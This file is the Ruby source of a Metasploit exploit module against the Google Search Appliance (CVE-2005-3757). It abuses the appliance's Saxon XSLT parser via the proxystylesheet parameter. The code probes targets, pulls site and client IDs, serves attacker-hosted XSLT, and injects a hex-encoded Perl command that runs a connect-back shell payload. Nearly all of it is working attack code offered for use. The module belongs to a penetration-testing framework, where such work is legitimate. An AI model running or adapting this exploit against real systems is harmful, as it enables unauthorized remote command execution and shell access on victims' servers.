modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Description' => %q{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2005-3757'],
['OSVDB', '20981'],
['BID', '15509'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 4000,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => '2005-08-16',
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultTarget' => 0))
end
# Handle incoming requests from the appliance
def on_request_uri(cli, request)
print_status("Handling new incoming HTTP request...")
exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
send_response(cli, data)
end
def autofilter
true
end
def check
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
{
'client' => rand_text_alpha(rand(15)+1),
'site' => rand_text_alpha(rand(15)+1),
'output' => 'xml_no_dtd',
'q' => rand_text_alpha(rand(15)+1),
'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
}
}, 10)
if (res and res.body =~ /cannot be resolved to an ip address/)
vprint_status("This system appears to be vulnerable")
return Exploit::CheckCode::Appears
end
if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
vprint_status("This system appears to be patched")
end
return Exploit::CheckCode::Safe
end
def exploit
# load the xml data
path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")
fd = File.open(path, "rb")
@xml_data = fd.read(fd.stat.size)
fd.close
print_status("Obtaining the appliance site and client IDs...")
# Send a HTTP/1.0 request to learn the site configuration
res = send_request_raw({
'uri' => '/',
'version' => '1.0'
}, 10)
if !(res and res['location'] and res['location'] =~ /site=/)
print_status("Could not read the location header: #{res.code} #{res.message}")
return
end
m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
if !(m and m[1] and m[2])
print_status("Invalid location header: #{res['location']}")
return
end
print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
start_service
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
'output' => 'xml_no_dtd',
'q' => rand_text_alpha(rand(15)+1),
'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
'proxyreload' => '1'
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
select(nil,nil,nil,20)
else
print_status("No response from the server")
end
end
end